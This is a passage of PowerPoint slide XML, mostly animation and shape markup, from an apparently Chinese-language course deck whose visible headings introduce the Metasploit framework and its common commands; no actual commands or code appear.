                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
